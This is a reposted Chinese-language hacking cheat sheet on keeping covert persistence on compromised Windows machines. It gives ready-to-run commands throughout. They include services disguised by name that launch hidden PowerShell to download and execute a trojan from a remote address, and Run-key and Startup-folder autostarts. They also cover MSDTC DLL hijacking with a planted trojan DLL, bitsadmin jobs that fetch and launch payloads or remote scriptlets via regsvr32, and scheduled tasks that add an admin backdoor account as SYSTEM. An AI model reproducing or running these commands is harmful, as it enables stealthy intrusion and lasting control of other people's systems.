转自--http://www.ansbase5.org/?p=366

服务启动

使用SC命令创建windows服务名最好伪装下,binpath= 这里一定要注意有个空格,不然创建不成功,把powershell远程执行下载命令也包含进去地址：http://192.168.1.82:19001/a链接就是我们刚刚生成的木马地址

sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX(((new-object net.webclient).downloadstring('http://192.168.1.82:19001/a'))\""

SC config "name" start= auto //我们需要把这个name服务设置为自动。

Sc description "name" "description" // 设置服务的描述字符串

net start "name" // 启动服务

SC delete "name" //删除这个服务，不想使用服务直接删除

PS:不是所有程序都可以作为服务的方式运行,所以请看：http://www.x2009.net/articles/create-a-windows-service-methods.html

regedit 注册表启动

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact1.exe" /f//当系统注销,再次进入登入到目标系统就会上线,权限是继承的。

MSDTC

http://www.4hou.com/system/6890.html

简单说：在域和工作组中，MSDTC服务启动时，会搜索注册表Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI，MSDTC.exe启动时会加载3个dll(oci.dll,SQLLib80.dll,xa80.dll)，有一个dll不是系统自带的，我们可以把我们的dll马子替换成其中的那个不自带的dll的名字(oci.dll)。

net start msdtc // 手动启动 msdtc

降权启动MSDTC.exe ：msdtc -install

>PS: 渗透技巧——程序的降权启动 http://t.cn/RSp4h4O

启动项

C:\Users\{user}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Bitsadmin

该项的自启动是利用了schtasks来自启动的，必须要用户登录，且在登录后2-4分钟后才会执行,此法貌似是有个90天的限制的？

需要权限：管理员

说明：下方的start_test是任务名，%comspec%是cmd的绝对路径，%temp%是用户的临时目录。

第一种：配合Powershell，测试成功

bitsadmin /create start_test //添加用户名

bitsadmin /addfile start_test %comspec% %temp%\cmd.exe //添加文件，此步骤是为下一步做铺垫，

bitsadmin /SetNotifyCmdLine start_test "%COMSPEC%" "cmd.exe /c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.1:81/a'))\""  //第二步完成之后就启动这一步

bitsadmin /Resume start_test //启动下载任务

第二种：直接下载EXE执行

bitsadmin /create start_test //创建任务

bitsadmin /addfile start_test http://www.baidu.com/muma.exe %temp%\muma.exe //添加文件，此步骤是为下一步做铺垫，

bitsadmin /SetNotifyCmdLine start_test "%COMSPEC%" "cmd.exe /c bitsadmin.exe /complete \"backdoor\" && start /B %temp%\muma.exe"  //第二步完成之后就启动这一步

bitsadmin /Resume start_test //启动下载任务

配合其他命令||我举一，你反三

道理都是一样的，你可以用regsvr32，也可以用其他的下载命令。

bitsadmin /create backdoor

bitsadmin /addfile backdoor %comspec%  %temp%\cmd.exe

bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"

bitsadmin /Resume backdoor

更加多的命令请看阅读：windows命令执行漏洞不会玩？ 看我！：https://evi1cg.me/archives/remote_exec.html ||

下载文件的15种方法 - 爱小狐狸的小螃蟹：http://www.vuln.cn/6665 ||

13种方式下载文件：https://evi1cg.me/archives/13-ways-to-download-a-file.html

更多关于Bitsadmin姿势请阅读：Use bitsadmin to maintain persistence and bypass Autoruns：https://www.tuicool.com/articles/rqe63qj||

使用计划任务和bitsadmin实现恶意代码长期控守：http://blog.csdn.net/qq_31481187/article/details/57540231

SchTasks

>强大的任务计划功能，你值得拥有的：官方网站文档：https://technet.microsoft.com/zh-cn/library/cc772785.aspx#BKMK_days

Onstart:schtasks /create /tn sch /ru system /sc onstart /tr "net user admin admin /add"  /f

Onlogin:schtasks /create /tn sch /ru system /sc onlogin /tr "net user admin admin /add"  /f

Onidle:schtasks /create /tn sch /ru system /sc onidle /i 1 /tr "net user admin admin /add"  /f

every 1 min:schtasks /create /tn sch /ru system /sc MINUTE /mo 1  /tr "net user admin admin /add" /f

every 1 day:schtasks /create /tn sch /ru system /sc daily /mo 1  /tr "net user admin admin /add"  /f

onince:schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc once /sd 01/01/2003 /st 00:00  /f